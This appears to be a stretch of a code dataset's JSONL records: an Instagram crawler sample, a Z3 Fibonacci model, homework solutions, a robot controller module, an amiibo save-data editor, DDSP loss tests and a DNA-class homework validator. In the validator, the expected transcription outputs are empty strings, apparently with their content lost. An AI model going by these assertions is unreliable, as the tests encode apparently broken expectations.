next_media_ids = hashtag_json['next_media_ids']\n\n return hashtag_json, next_max_id, next_media_ids, next_page\n\n\ntry:\n login = InstagramCommonCrawler(client=client, logger=logger).login(login_account_id, login_account_pw)\n\n if login:\n hashtag = InstagramHashtagCrawler(client)\n\n if next_max_id is None:\n hashtag_json, next_max_id, next_media_ids, next_page = get_hashtag_posts(target_hashtag)\n\n while next_max_id is not None:\n time.sleep(2)\n\n hashtag_json, next_max_id, next_media_ids, next_page = get_hashtag_posts(target_hashtag, next_max_id,\n next_media_ids, next_page)\n\n logger.info(f\"next_max_id: {next_max_id}\")\n\n client.driver_quit()\n\nexcept Exception as e:\n logger.exception(f\"Failed to function {e}\")\n client.driver_quit()\n","repo_name":"kory-/instagram_selenium_crawler","sub_path":"sample/hashtag.py","file_name":"hashtag.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"6982870700","text":"#!/usr/bin/python -u\n# -*- coding: latin-1 -*-\n# \n# Fibonacci (bidirectional) in Z3\n# \n# This Z3 model was written by Hakan Kjellerstrand (hakank@gmail.com)\n# See also my Z3 page: http://hakank.org/z3/\n# \n# \nfrom z3 import *\n\n# From https://rise4fun.com/Z3/0pld:\n# \"\"\"\n# (declare-fun fib (Int) Int)\n# (assert (= 1 (fib 0)))\n# (assert (= 1 (fib 1)))\n# (assert (forall (x Int) (=> (>= x 2) (= (fib x) (+ (fib (- x 1)) (fib (- x 2)))))))\n# (assert (= 2 (fib 2)))\n# \"\"\"\n\nsol = Solver()\n\nmax_n = 31\n\n#\n# Note: One have to set a max limit on fib\n#\n# https://stackoverflow.com/questions/6915227/can-z3-check-the-satisfiability-of-formulas-that-contain-recursive-functions\n# Leonardo de Moura:\n# \"\"\"\n# The models produced by Z3 assign an interpretation for each uninterpreted function symbol. The models can\n# be viewed as functional programs. The current version does not produce recursive definitions.\n# The first example [Fibonacci] is satisfiable, but Z3 fails to produce an interpretation for fib because\n# it does not support recursive definitions. We have plans to extend Z3 in this direction.\n# \"\"\"\nfib = Function(\"fib\", IntSort(), IntSort())\nx = Int(\"x\")\n# sol.add(fib(0) == 1)\n# sol.add(fib(1) == 1)\n# sol.add(ForAll(x, Implies(And(x >= 2, x <= max_n), fib(x) == fib(x-1) + fib(x-2))))\n# Simpler:\nsol.add(ForAll(x, If(And(x >= 2, x <= max_n), fib(x) == fib(x-1) + fib(x-2), fib(x) == 1)))\n\n# sol.add(x == fib(2))\ny = Int(\"y\")\nz = Int(\"z\")\nsol.add(y>0, y <= max_n, z >0, z <= max_n)\n\nsol.add(10946 == fib(y))\nsol.add(2178309 == fib(z))\n\nprint(sol)\nif sol.check()==sat:\n mod = sol.model()\n # print(\"x:\", mod.eval(x))\n print(\"z:\", mod.eval(z), \"y:\", mod.eval(y))\n sol.add(z != mod.eval(z),y != mod.eval(y))\n","repo_name":"hakank/hakank","sub_path":"z3/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":339,"dataset":"github-code","pt":"7"}
+{"seq_id":"13777544241","text":"# Nama: Evry Nazyli Ciptanto\n# NIM: 0110220045\n# Kelas: TI 08\n\nclass Node:\n def __init__(self, data = None, next = None):\n self.data = data\n self.next = next\n \nclass LinkedList:\n def __init__(self, head = None):\n self.head = head\n \n def add_last(self, new_data):\n if self.head is None:\n self.head = Node(new_data)\n else:\n current = self.head\n while current.next is not None:\n current = current.next\n current.next = Node(new_data)\n \n def cetak(self):\n if self.head is None:\n print('List kosong')\n else:\n current = self.head\n while current is not None:\n print(current.data, end=' ')\n current = current.next\n print()\n\n def sum_odd(self):\n # Tuliskan implementasi fungsi sum_odd() di bawah ini\n # Hapus pass jika implementasi sudah dibuat\n # membuat variabel awal x = 0\n x = 0\n # inisialisasi element pertama\n current_node = self.head\n # kondisi perulangan selama element tidak none\n while current_node is not None:\n # kondisi untuk mencari bilangan ganjil\n if(current_node.data % 2 != 0):\n # menambahkan data ke element x\n x += current_node.data\n # incremenet atau pindah ke element berikutnya\n current_node = current_node.next\n # mengembalikan hasil\n return x\n \n def get_max(self):\n # Tuliskan implementasi fungsi get_max() di bawah ini\n # Hapus pass jika implementasi sudah dibuat\n # inisialisasi element pertama\n current_node = self.head\n # jika element pertama none\n if current_node == None:\n # kembalikan nilai none\n return\n # kondisi yang lain\n else :\n # membuat variabel awal x = 0\n x = 0\n # kondisi perulangan selama element tidak none\n while current_node is not None:\n # kondisi untuk mencari bilangan max\n if x < current_node.data:\n # jika kondisi terpenuhi set x dengan nilai element\n x = current_node.data\n # incremenet atau pindah ke element berikutnya\n current_node = current_node.next\n # mengembalikan bilangan terbesar\n return x\n\n\n# Mulai baris ini hingga baris paling bawah\n# digunakan untuk mengetes fungsi yang telah dibuat.\n# Tidak perlu mengubah bagian ini.\n# Ketika dijalankan, program akan menampilkan contoh\n# pemanggilan fungsi dan solusi yang seharusnya.\n# Cocokkan hasil pemanggilan fungsi dengan solusi \n# yang seharusnya.\ndef test():\n list1 = LinkedList()\n list1.add_last(1)\n list1.add_last(2)\n list1.add_last(3)\n list1.add_last(4)\n list1.add_last(5)\n print('list1 : ', end='')\n list1.cetak()\n r1 = list1.sum_odd()\n print(f\"list1.sum_odd() = {r1} \\t(solusi: 9)\")\n r2 = list1.get_max()\n print(f\"list1.get_max() = {r2} \\t(solusi: 5)\")\n print()\n\n list2 = LinkedList()\n list2.add_last(9)\n list2.add_last(9)\n list2.add_last(9)\n print('list2 : ', end='')\n list2.cetak()\n r1 = list2.sum_odd()\n print(f\"list2.sum_odd() = {r1} \\t(solusi: 27)\")\n r2 = list2.get_max()\n print(f\"list2.get_max() = {r2} \\t(solusi: 9)\")\n print()\n\n list3 = LinkedList()\n list3.add_last(6)\n list3.add_last(2)\n list3.add_last(8)\n list3.add_last(4)\n print('list3 : ', end='')\n list3.cetak()\n r1 = list3.sum_odd()\n print(f\"list3.sum_odd() = {r1} \\t(solusi: 0)\")\n r2 = list3.get_max()\n print(f\"list3.get_max() = {r2} \\t(solusi: 8)\")\n print()\n\n list4 = LinkedList()\n print('list4 : ', end='')\n list4.cetak()\n r1 = list4.sum_odd()\n print(f\"list4.sum_odd() = {r1} \\t(solusi: 0)\")\n r2 = list4.get_max()\n print(f\"list4.get_max() = {r2} \\t(solusi: None)\")\n print()\n\nif __name__ == '__main__':\n 
test()","repo_name":"Nazyli/DDP-TI08-Lab-10","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"39947074798","text":"import math\n\n\ndef main(x, y):\n storage = 0.\n n = len(x)\n for i in range(1, n):\n storage += math.sin(y[n - math.ceil(i / 3)]**2 + 58*x[i])**7\n return 13*storage\n\n\nprint(main([-0.22, -0.76, -0.89], [-0.14, -0.14, 0.54]))\n","repo_name":"ucantjugglikeme/python_exam","sub_path":"Task5v5.py","file_name":"Task5v5.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"74165464544","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 9 10:46:14 2018\n\n@author: alxgr\n\"\"\"\n\n###############################################################################\nimport numpy as np\nfrom scipy.interpolate import interp1d\n###############################################################################\nfrom pyro.control import controller\nfrom pyro.dynamic import mechanical\n###############################################################################\n\n\n\n\n###############################################################################\n# Computed Torque\n###############################################################################\n \nclass ComputedTorqueController( controller.StaticController ) :\n \"\"\" \n Inverse dynamic controller for mechanical system\n\n \"\"\" \n \n ############################\n def __init__(self, model = mechanical.MechanicalSystem() , traj = None ):\n \"\"\"\n \n ---------------------------------------\n r : reference signal vector k x 1\n y : sensor signal vector p x 1\n u : control inputs vector m x 1\n t : time 1 x 1\n ---------------------------------------\n u = c( y , r , t )\n \n \"\"\"\n \n self.model = model\n \n # Dimensions\n self.k = model.dof \n self.m = model.m\n self.p = model.p\n \n super().__init__(self.k, self.m, self.p)\n \n # Label\n self.name = 'Computed Torque Controller'\n \n # Params\n self.w0 = 1\n self.zeta = 0.7 \n \n # Mode\n if traj == None:\n self.c = self.c_fixed_goal\n else:\n self.load_trajectory( traj )\n self.mode = 'interpol'\n self.c = self.c_trajectory_following\n \n \n #############################\n def c_fixed_goal( self , y , r , t = 0 ):\n \"\"\" \n Feedback static computation u = c(y,r,t)\n \n INPUTS\n y : sensor signal vector p x 1\n r : reference signal vector k x 1\n t : time 1 x 1\n \n OUPUTS\n u : control inputs vector m x 1\n \n \"\"\"\n \n x = y \n q_d = r\n \n u = self.fixed_goal_ctl( x , q_d , t )\n \n return u\n \n \n \n ############################\n def fixed_goal_ctl( self , x , q_d , t = 0 ):\n \"\"\" \n \n Given desired fixed goal state and actual state, compute torques\n \n \"\"\"\n [ q , dq ] = self.model.x2q( x ) \n \n ddq_d = np.zeros( self.model.dof )\n dq_d = np.zeros( self.model.dof )\n\n ddq_r = self.compute_ddq_r( ddq_d , dq_d , q_d , dq , q )\n \n u = self.model.actuator_forces( q , dq , ddq_r )\n \n return u\n \n \n ############################\n def compute_ddq_r( self , ddq_d , dq_d , q_d , dq , q ):\n \"\"\" \n \n Given desired trajectory and actual state, compute ddq_r\n \n \"\"\"\n \n q_e = q - q_d\n dq_e = dq - dq_d\n \n ddq_r = ddq_d - 2 * self.zeta * self.w0 * dq_e - self.w0 ** 2 * q_e\n \n return ddq_r\n \n \n ############################\n def load_trajectory( self , traj ):\n \"\"\" \n \n Load Open-Loop trajectory solution to use as reference trajectory\n \n \"\"\"\n \n self.trajectory = traj\n \n q = traj.x[ :, 0 : self.model.dof ]\n dq = traj.x[ :, self.model.dof : 2 * self.model.dof ]\n ddq = traj.dx[:, self.model.dof : 2 * self.model.dof ]\n t = traj.t\n \n # Create interpol functions\n self.q = interp1d(t,q.T)\n self.dq = interp1d(t,dq.T)\n self.ddq = interp1d(t,ddq.T)\n \n \n ############################\n def get_traj( self , t ):\n \"\"\" \n \n Find closest point on the trajectory\n \n \"\"\"\n \n if t < self.trajectory.time_final :\n\n # Load trajectory\n q = self.q( t )\n dq = self.dq( t )\n ddq = self.ddq( t ) \n\n else:\n \n q = self.rbar\n dq = np.zeros( self.model.dof )\n ddq = np.zeros( self.model.dof )\n \n 
return ddq , dq , q\n \n \n ############################\n def traj_following_ctl( self , x , t = 0 ):\n \"\"\" \n \n Given desired loaded trajectory and actual state, compute torques\n \n \"\"\"\n \n [ q , dq ] = self.model.x2q( x ) \n \n ddq_d , dq_d , q_d = self.get_traj( t )\n\n ddq_r = self.compute_ddq_r( ddq_d , dq_d , q_d , dq , q )\n \n u = self.model.actuator_forces( q , dq , ddq_r )\n \n return u\n \n \n #############################\n def c_trajectory_following( self , y , r , t ):\n \"\"\" \n Feedback static computation u = c(y,r,t)\n \n INPUTS\n y : sensor signal vector p x 1\n r : reference signal vector k x 1\n t : time 1 x 1\n \n OUPUTS\n u : control inputs vector m x 1\n \n \"\"\"\n \n x = y \n \n u = self.traj_following_ctl( x , t )\n \n \n return u\n \n\n\n##############################################################################\n \nclass SlidingModeController( ComputedTorqueController ):\n \"\"\" \n Sliding Mode Controller for fully actuated mechanical systems\n \"\"\"\n \n \n ############################\n def __init__( self , model , traj = None ):\n \"\"\" \"\"\"\n \n super().__init__( model , traj )\n \n # Params\n self.lam = 1 # Sliding surface slope\n self.gain = 1 # Discontinuous gain\n self.nab = 0.1 # Min convergence rate\n \n \n ############################\n def compute_sliding_variables( self , ddq_d , dq_d , q_d , dq , q ):\n \"\"\" \n \n Given desired trajectory and actual state\n \n \"\"\" \n q_e = q - q_d\n dq_e = dq - dq_d\n \n s = dq_e + self.lam * q_e\n dq_r = dq_d - self.lam * q_e\n ddq_r = ddq_d - self.lam * dq_e\n \n return [ s , dq_r , ddq_r ]\n \n \n ############################\n def K( self , q , t ):\n \"\"\" Discontinuous gain matrix \"\"\"\n \n dist_max = np.diag( np.ones( self.model.dof ) ) * self.gain\n conv_min = np.diag( np.ones( self.model.dof ) ) * self.nab\n \n K = dist_max + np.dot( self.model.H( q ) , conv_min ) \n \n return K\n \n \n ############################\n def sliding_torque( self , ddq_r , s , dq , q , t ):\n \"\"\" \n \n Given actual state, compute torque necessarly to guarantee convergence\n \n \"\"\"\n \n u_computed = self.model.actuator_forces( q , dq , ddq_r )\n \n u_discontinuous = np.dot( self.K( q , t ) , np.sign( s ) )\n \n u_tot = u_computed - u_discontinuous\n \n return u_tot\n \n \n ############################\n def traj_following_ctl( self , x , t = 0 ):\n \"\"\" \n \n Given desired loaded trajectory and actual state, compute torques\n \n \"\"\"\n \n [ q , dq ] = self.model.x2q( x ) \n \n ddq_d , dq_d , q_d = self.get_traj( t )\n\n [ s , dq_r , ddq_r ] = self.compute_sliding_variables( ddq_d , dq_d , \n q_d , dq , q )\n \n u = self.sliding_torque( ddq_r , s , dq , q , t )\n \n return u\n \n \n ############################\n def fixed_goal_ctl( self , x , q_d , t = 0 ):\n \"\"\" \n \n Given desired fixed goal state and actual state, compute torques\n \n \"\"\"\n \n [ q , dq ] = self.model.x2q( x ) \n \n ddq_d = np.zeros( self.model.dof )\n dq_d = np.zeros( self.model.dof )\n\n [ s , dq_r , ddq_r ] = self.compute_sliding_variables( ddq_d , dq_d , \n q_d , dq , q )\n \n u = self.sliding_torque( ddq_r , s , dq , q , t )\n \n return u\n\n \n'''\n#################################################################\n################## Main ########\n#################################################################\n'''\n\n\nif __name__ == \"__main__\": \n \"\"\" MAIN TEST \"\"\"\n \n from pyro.dynamic import pendulum\n\n\n sys = pendulum.DoublePendulum()\n ctl = ComputedTorqueController( sys )\n \n # New 
cl-dynamic\n cl_sys = ctl + sys\n \n cl_sys.x0 = np.array([2,1,0,0])\n cl_sys.compute_trajectory()\n cl_sys.plot_phase_plane_trajectory(0,2)\n cl_sys.animate_simulation()\n \n","repo_name":"alx87grd/AlexRobotics","sub_path":"pyro/control/nonlinear.py","file_name":"nonlinear.py","file_ext":"py","file_size_in_byte":9249,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"7"}
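A note on the controller record above: the core of ComputedTorqueController is one line of math, ddq_r = ddq_d - 2*zeta*w0*(dq - dq_d) - w0**2*(q - q_d), which forces the tracking error to behave like a damped second-order system before the inverse dynamics turn ddq_r into torques. A standalone numeric check of that law using the record's default gains:

import numpy as np

w0, zeta = 1.0, 0.7  # the record's default natural frequency and damping ratio

def compute_ddq_r(ddq_d, dq_d, q_d, dq, q):
    # Desired acceleration plus a PD correction on the tracking error.
    q_e, dq_e = q - q_d, dq - dq_d
    return ddq_d - 2 * zeta * w0 * dq_e - w0 ** 2 * q_e

z = np.zeros(2)
assert np.allclose(compute_ddq_r(z, z, z, z, z), z)      # zero error, no correction
print(compute_ddq_r(z, z, np.array([1.0, 0.0]), z, z))   # accelerates toward q_d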
+{"seq_id":"25925928618","text":"from amiibo import AmiiboDump\nfrom amiibo.crypto import AmiiboBaseError\nimport copy\n\nclass InvalidAmiiboDump(AmiiboBaseError):\n pass\n\nclass IncorrectGameDataIdException(Exception):\n pass\n\n\nclass InvalidSsbuChecksum(Exception):\n pass\n\nclass SsbuAmiiboDump(AmiiboDump):\n \"\"\"\n Class that's a thin wrapper around AmiiboDump.\n Checks the amiibo has the super smash bros game id in the game data section on unlock\n Writes the HMAC for the game data before locking\n \"\"\"\n def __init__(self, master_keys, dump, is_locked=True):\n super().__init__(master_keys, dump, is_locked)\n self.dumpcopy = copy.deepcopy(self)\n if is_locked == True:\n self.dumpcopy.unlock()\n\n def unlock(self, verify=True):\n super().unlock(verify=verify)\n\n # Checks if the amiibo's game is Super Smash Bros. Ultimate, and if not, we initialize it.\n if bytes(self.data[266:270]).hex() != \"34f80200\":\n self.data[0x14] = self.data[0x14] | (1 << 5)\n self.data[266:270] = bytes.fromhex(\"34f80200\")\n self.data[0x100:0x108] = bytes.fromhex('01006A803016E000')\n self.data[0x130:0x208] = bytes.fromhex(\"00\" * 0xD8)\n self.data[304:308] = self._calculate_crc32(self.data[308:520]).to_bytes(4, \"little\")\n\n if self.data[304:308].hex() != self._calculate_crc32(self.data[308:520]).to_bytes(4, \"little\").hex():\n raise InvalidSsbuChecksum(f'The checksum for this game data is not correct. Please use an untampered amiibo')\n\n def lock(self):\n if self.data[444:502] != self.dumpcopy.data[444:502]:\n self.data[311] = self.data[311] | 1\n if self.amiibo_nickname[-1] != '□':\n if len(self.amiibo_nickname) == 10:\n self.amiibo_nickname = self.amiibo_nickname[:-1] + '□'\n else:\n self.amiibo_nickname = self.amiibo_nickname + '□'\n elif self.dumpcopy.amiibo_nickname[-1] == '□' and self.amiibo_nickname[-1] != '□':\n if len(self.amiibo_nickname) == 10:\n self.amiibo_nickname = self.amiibo_nickname[:-1] + '□'\n else:\n self.amiibo_nickname = self.amiibo_nickname + '□'\n checksum = self._calculate_crc32(self.data[308:520])\n mii_checksum = str(hex(self.crc16_ccitt_wii(self.data[0xA0:0xFE]))).lstrip('0x')\n while len(mii_checksum) < 4:\n mii_checksum = '0' + mii_checksum\n self.data[304:308] = checksum.to_bytes(4, \"little\")\n self.data[0xFE:0x100] = bytes.fromhex(mii_checksum)\n super().lock()\n\n @staticmethod\n def _calculate_crc32(input):\n # Setup CRC 32 table. 
Translated from js to python from amiibox codebase\n # (should move this out so it sets up once, but it's quick enough as is)\n p0 = 0xEDB88320 | 0x80000000\n p0 = p0 >> 0\n\n u0 = [0] * 0x100\n i = 1\n while (i & 0xFF):\n t0 = i\n for _ in range(8):\n b = (t0 & 0x1) >> 0\n t0 = (t0 >> 0x1) >> 0\n if b:\n t0 = (t0 ^ p0) >> 0\n u0[i] = t0 >> 0\n i += 1\n\n # Calculate CRC32 from table\n t = 0x0\n for k in input:\n t = ((t >> 0x8) ^ u0[(k ^ t) & 0xFF]) >> 0\n return (t ^ 0xFFFFFFFF) >> 0\n\n def crc16_ccitt_wii(self, data):\n crc = 0\n\n for byte in data:\n byte = int.from_bytes([byte], 'big')\n\n crc = crc ^ (byte << 8)\n\n for _ in range(8):\n crc = crc << 1\n\n if (crc & 0x10000) > 0:\n crc ^= 0x1021\n\n return (crc & 0xFFFF)\n\n\n @property\n def amiibo_nickname(self):\n # TODO: why is the Amiibo nickname big endian,\n # but the Mii nickname litle endian?\n return self.data[0x020:0x034].decode('utf-16-be').rstrip('\\x00')\n\n @amiibo_nickname.setter\n def amiibo_nickname(self, name):\n utf16 = name.encode('utf-16-be')\n if len(utf16) > 20:\n raise ValueError\n self.data[0x020:0x034] = utf16.ljust(20, b'\\x00')\n","repo_name":"jozz024/smash-amiibo-editor","sub_path":"utils/ssbu_amiibo.py","file_name":"ssbu_amiibo.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"7"}
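A note on the amiibo record above: _calculate_crc32 tabulates the reflected CRC-32 polynomial 0xEDB88320 but starts the running register at 0 rather than the conventional 0xFFFFFFFF, so its results generally differ from the standard CRC-32 even though the final XOR matches. A quick comparison against the stdlib variant (the input bytes are arbitrary test data, not real amiibo game data):

import zlib

data = bytes(range(32))  # arbitrary stand-in for the data[308:520] slice

# Standard CRC-32: init 0xFFFFFFFF, reflected poly 0xEDB88320, final XOR.
print(hex(zlib.crc32(data) & 0xFFFFFFFF))

# SsbuAmiiboDump._calculate_crc32(data) would normally print a different value,
# since only the initial register value distinguishes the two variants.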
+{"seq_id":"9718059918","text":"from ddsp import core\nfrom ddsp import losses\nimport numpy as np\nimport tensorflow as tf\n\n\nclass LossGroupTest(tf.test.TestCase):\n\n def setUp(self):\n \"\"\"Create some dummy input data for the chain.\"\"\"\n super().setUp()\n\n # Create a network output dictionary.\n self.nn_outputs = {\n 'audio': tf.ones((3, 8000), dtype=tf.float32),\n 'audio_synth': tf.ones((3, 8000), dtype=tf.float32),\n 'magnitudes': tf.ones((3, 200, 2), dtype=tf.float32),\n 'f0_hz': 200 + tf.ones((3, 200, 1), dtype=tf.float32),\n }\n\n # Create Processors.\n spectral_loss = losses.SpectralLoss()\n crepe_loss = losses.PretrainedCREPEEmbeddingLoss(name='crepe_loss')\n\n # Create DAG for testing.\n self.dag = [\n (spectral_loss, ['audio', 'audio_synth']),\n (crepe_loss, ['audio', 'audio_synth']),\n ]\n self.expected_outputs = [\n 'spectral_loss',\n 'crepe_loss'\n ]\n\n def _check_tensor_outputs(self, strings_to_check, outputs):\n for tensor_string in strings_to_check:\n tensor = core.nested_lookup(tensor_string, outputs)\n self.assertIsInstance(tensor, (np.ndarray, tf.Tensor))\n\n def test_dag_construction(self):\n \"\"\"Tests if DAG is built properly and runs.\n \"\"\"\n loss_group = losses.LossGroup(dag=self.dag)\n print('!!!!!!!!!!!', loss_group.dag, loss_group.loss_names, self.dag)\n loss_outputs = loss_group(self.nn_outputs)\n self.assertIsInstance(loss_outputs, dict)\n self._check_tensor_outputs(self.expected_outputs, loss_outputs)\n\n\nclass SpectralLossTest(tf.test.TestCase):\n\n def test_output_shape_is_correct(self):\n \"\"\"Test correct shape with all losses active.\"\"\"\n loss_obj = losses.SpectralLoss(\n mag_weight=1.0,\n delta_time_weight=1.0,\n delta_freq_weight=1.0,\n cumsum_freq_weight=1.0,\n logmag_weight=1.0,\n loudness_weight=1.0,\n )\n\n input_audio = tf.ones((3, 8000), dtype=tf.float32)\n target_audio = tf.ones((3, 8000), dtype=tf.float32)\n\n loss = loss_obj(input_audio, target_audio)\n\n self.assertListEqual([], loss.shape.as_list())\n self.assertTrue(np.isfinite(loss))\n\n\n\n\nclass PretrainedCREPEEmbeddingLossTest(tf.test.TestCase):\n\n def test_output_shape_is_correct(self):\n loss_obj = losses.PretrainedCREPEEmbeddingLoss()\n\n input_audio = tf.ones((3, 16000), dtype=tf.float32)\n target_audio = tf.ones((3, 16000), dtype=tf.float32)\n\n loss = loss_obj(input_audio, target_audio)\n\n self.assertListEqual([], loss.shape.as_list())\n self.assertTrue(np.isfinite(loss))\n\n\nif __name__ == '__main__':\n tf.test.main()\n","repo_name":"magenta/ddsp","sub_path":"ddsp/losses_test.py","file_name":"losses_test.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":2656,"dataset":"github-code","pt":"7"}
+{"seq_id":"24403063213","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"Validator script for CS 2204 Homework submissions\"\"\"\nimport sys\nimport os\nimport traceback\nfrom contextlib import redirect_stdout, redirect_stderr\nfrom importlib.util import spec_from_file_location, module_from_spec\nfrom io import StringIO\n\nimport pycodestyle\n\n\n#########################################################################\n# Test infrastructure\n\ndef points(val):\n \"\"\"Simple decorator to add a __points__ property to a function\n Usage: @points(10)\n \"\"\"\n def decorator(func):\n func.__points__ = val\n return func\n return decorator\n\n\ndef abort(func):\n \"\"\"Simple decorator to add a __abort__ property to a function\"\"\"\n func.__abort__ = True\n return func\n\n\ndef import_file(filename, module_name=None):\n \"\"\"Import a file with a given module name. Returns the module object\"\"\"\n if module_name is None:\n module_name, _ = os.path.splitext(os.path.basename(filename))\n spec = spec_from_file_location(module_name, filename)\n module = module_from_spec(spec)\n spec.loader.exec_module(module)\n return module\n\n\ndef run_file(filename):\n \"\"\"Runs the file at the top-level. Returns standard output, error tuple\"\"\"\n with StringIO() as stdout, StringIO() as stderr:\n with redirect_stdout(stdout), redirect_stderr(stderr):\n import_file(filename, \"__main__\")\n out = stdout.getvalue()\n err = stderr.getvalue()\n\n return out, err\n\n\ndef check_pep8_style(filename):\n \"\"\"Checking PEP8 style for filename. Returns n_errors, messages tuple\"\"\"\n\n with StringIO() as out, \\\n redirect_stdout(out), \\\n redirect_stderr(sys.stdout):\n\n pep8_checker = pycodestyle.Checker(filename, show_source=True)\n pep8_errors = pep8_checker.check_all()\n pep8_msgs = out.getvalue()\n\n return pep8_errors, pep8_msgs\n\n\ndef validate(*tests):\n \"\"\"Validation function\"\"\"\n total_score = 0\n divider = \"-\" * 45\n\n for test in tests:\n max_points = getattr(test, \"__points__\", 0)\n abort = False\n\n print(divider)\n prefix = f\"{test.__doc__}:\"\n print(f\"{prefix:<{len(divider) - 10}}\", end=\"\")\n try:\n with StringIO() as out, \\\n redirect_stdout(out), \\\n redirect_stderr(sys.stdout):\n\n partial = test()\n msg = out.getvalue()\n\n except: # noqa\n with StringIO() as tb_out:\n traceback.print_exc(limit=-1, file=tb_out)\n msg = tb_out.getvalue()\n\n points = min(max_points, 0)\n abort = getattr(test, \"__abort__\", False)\n\n else:\n if partial is not None:\n points = partial\n else:\n points = max(max_points, 0)\n\n suffix = \"ok\"\n if max_points <= 0:\n if points != 0:\n suffix = f\"{points:+d} pts\"\n else:\n suffix = f\"{points}/{max_points} pts\"\n print(f\"{suffix:>10}\")\n\n if msg:\n print(f\"\\n\\n{msg}\")\n\n total_score += points\n\n if abort:\n print(\"Aborting future tests. 
Fix this one, first!\")\n break\n\n total_score = max(total_score, 0)\n print(\"=\" * len(divider))\n print(f\"Final score (estimated): {total_score:.0f} pts\")\n\n\n#########################################################################\n# Assignment-specific tests\n\n# Notes:\n# You can set the max positive points for each test with @points()\n# You can also set a negative value with @points, it is interpreted as penalty.\n# If the test returns with\n# - None: max positive points are added, no penalties are applied\n# - Number: a given points are added, if negative, given penalties are applied\n# - Exception: no positive points are added, max penalties applied\n\n\n@points(10)\ndef test_codon_constructor():\n \"\"\"Testing Codon class initializer\"\"\"\n module = import_file(\"dna.py\")\n Codon = module.Codon\n\n # valid patterns\n for pattern in \"act\", \"Act\", \"CTG\":\n _ = Codon(pattern)\n\n # invalid patterns\n for pattern in None, 7, \"\", \"actg\", \"acx\":\n try:\n _ = Codon(pattern)\n except: # noqa\n pass\n else:\n print(f\"Initializer should refuse this parameter: {pattern!r}\")\n return 0\n\n\n@points(10)\ndef test_codon_str():\n \"\"\"Testing Codon string conversion\"\"\"\n module = import_file(\"dna.py\")\n Codon = module.Codon\n assert str(Codon(\"ACT\")) == \"[ACT]\"\n assert str(Codon(\"act\")) == \"[ACT]\"\n assert str(Codon(\"ggG\")) == \"[GGG]\"\n\n\n@points(10)\ndef test_codon_eq():\n \"\"\"Testing Codon equality\"\"\"\n module = import_file(\"dna.py\")\n Codon = module.Codon\n assert Codon(\"ACT\") == Codon(\"ACT\")\n assert Codon(\"ACT\") == Codon(\"act\")\n assert Codon(\"act\") != Codon(\"acg\")\n\n\n@points(10)\ndef test_codon_transcribe():\n \"\"\"Testing Codon transcription\"\"\"\n module = import_file(\"dna.py\")\n Codon = module.Codon\n assert Codon(\"ACT\").transcribe() == \"\"\n assert Codon(\"act\").transcribe() == \"\"\n assert Codon(\"acg\").transcribe() == \"\"\n\n\n@points(10)\ndef test_gene_constructor():\n \"\"\"Testing Gene class initializer\"\"\"\n module = import_file(\"dna.py\")\n Gene = module.Gene\n\n # valid patterns\n for pattern in \"\", \"ac\", \"actg\", \"actgg\", \"actggc\":\n _ = Gene(pattern)\n\n # invalid patterns\n for pattern in None, 7, \"xkcd\":\n try:\n _ = Gene(pattern)\n except: # noqa\n pass\n else:\n print(f\"Initializer should refuse this parameter: {pattern!r}\")\n return 0\n\n\n@points(10)\ndef test_gene_str():\n \"\"\"Testing Gene string conversion\"\"\"\n module = import_file(\"dna.py\")\n Gene = module.Gene\n assert str(Gene(\"\")) == \"\"\n assert str(Gene(\"ac\")) == \"\"\n assert str(Gene(\"act\")) == \"[ACT]\"\n assert str(Gene(\"actgg\")) == \"[ACT]\"\n assert str(Gene(\"actggc\")) == \"[ACT][GGC]\"\n assert str(Gene(\"actggctt\")) == \"[ACT][GGC]\"\n\n\n@points(10)\ndef test_gene_transcribe():\n \"\"\"Testing Gene transcription\"\"\"\n module = import_file(\"dna.py\")\n Gene = module.Gene\n assert Gene(\"\").transcribe() == \"\"\n assert Gene(\"ac\").transcribe() == \"\"\n assert Gene(\"act\").transcribe() == \"\"\n assert Gene(\"actgg\").transcribe() == \"\"\n assert Gene(\"actggctt\").transcribe() == \"\"\n\n\n@points(15)\ndef test_gene_contains():\n \"\"\"Testing Codon search in Gene\"\"\"\n module = import_file(\"dna.py\")\n Codon, Gene = module.Codon, module.Gene\n gene = Gene(\"actgggctgacctgttaaactgtc\")\n assert Codon(\"act\") in gene\n assert Codon(\"ggg\") in gene\n assert Codon(\"gtt\") not in gene\n assert Codon(\"ccc\") not in gene\n assert Codon(\"acg\") not in gene\n\n\n@points(15)\ndef 
test_gc_content():\n \"\"\"Testing GC content calculation\"\"\"\n from math import isclose\n from random import choices\n module = import_file(\"dna.py\")\n Gene = module.Gene\n for k in 10, 100, 1000:\n gene_str = \"\".join(choices(\"actg\", k=k))\n gene_str_cut = gene_str[:k - (k % 3)]\n gc_cnt = gene_str_cut.count(\"g\") + gene_str_cut.count(\"c\")\n gc_content = gc_cnt / len(gene_str_cut)\n if not isclose(gc_content, Gene(gene_str).gc_content()):\n print(f\"GC content should be {gc_content} for: \\n{gene_str}\")\n return 0\n\n\n@points(-10)\ndef test_author():\n \"\"\"Checking author information\"\"\"\n module = import_file(\"dna.py\")\n author = getattr(module, \"__author__\", None)\n assert isinstance(author, str) and author, \\\n \"__author__ variable is not set properly\"\n\n\ndef test_pep8():\n \"\"\"Checking PEP8 style\"\"\"\n\n n_errors, msgs = check_pep8_style(\"dna.py\")\n if n_errors:\n print(msgs)\n return -n_errors\n\n\nif __name__ == \"__main__\":\n validate(\n test_codon_constructor,\n test_codon_str,\n test_codon_eq,\n test_codon_transcribe,\n test_gene_constructor,\n test_gene_str,\n test_gene_transcribe,\n test_gene_contains,\n test_gc_content,\n test_author,\n 